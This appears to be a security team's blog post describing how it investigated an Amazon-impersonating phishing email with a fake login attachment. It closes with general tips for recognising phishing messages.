INSIGHTS 10 minutes in life of a security engineer

Throughout the history of the internet we’ve been taught to use buttons, hyperlinks and a million other UI elements, which, quite frankly, make our lives so much easier. One other kind of people (besides web developers) who like to hide something behind hyperlinks and buttons for the sake of convenience — are hackers. They perfectly know how programmed our brains are to interact with these (i.e. click), so they abuse it to do all sorts of nasty things: steal your credentials, install malware, etc.

In the information security team of About You we hear this question several times a day —” is this email legitimate / safe?”. This article will show you how we answer it.

At ABOUT YOU, we (the information security team) get reports of phishing emails from colleagues every day. And it’s our job to investigate these reports and understand if this is a real threat to the company.

In this article, I would like to showcase how we investigated one real phishing email, which arrived in an inbox of our colleague.

It all began with a phishy-looking email written in German.

Roughly translated, it says: “Friendly seller, there was a problem setting up automatic payments on Amazon… If you do not correct the errors within the next 48 hours, your account will be suspended. Thank you for selling on Amazon.

If you open the attachment, all you see is a login page that looks the same as the one from real Amazon.

There’s one catch though — if you click on “Anmelden” (German for “sign in”), your email, password and the OTP will be sent to a server controlled by a hacker. In the screenshot below you can see a request intercepted by one of the tools we use to investigate emails like that:

Now you can also see that this is clearly a malicious email with an intention to get access to your Amazon account.

This is just a simple example of a phishing email. We have seen much more sophisticated cases, which included: malicious Word attachments, business email compromise and fake sign in pages of different popular web sites…

How can you protect yourself?

A short answer to this question:

don’t click shit

And the long answer can fill in another Medium story :)

However, here are some tips how you can identify phishing emails:

  1. Did you expect this email? Is your answer “no”? The spidey-sense should start tingling.
  2. Do you know the sender? If not, the bells should be ringing louder.
  3. Does this email contain links / attachments? If it does, don’t open them yet, take a moment to think about them
  4. Does this email have a tone of urgency, like “do this immediately, otherwise this will happen”? If your answer is “yes”, you are probably looking at a phishing email.

If you want to dig deeper into the topic, I can totally recommend the following GitHub repository:

Stay safe and don’t let the hackers fool you.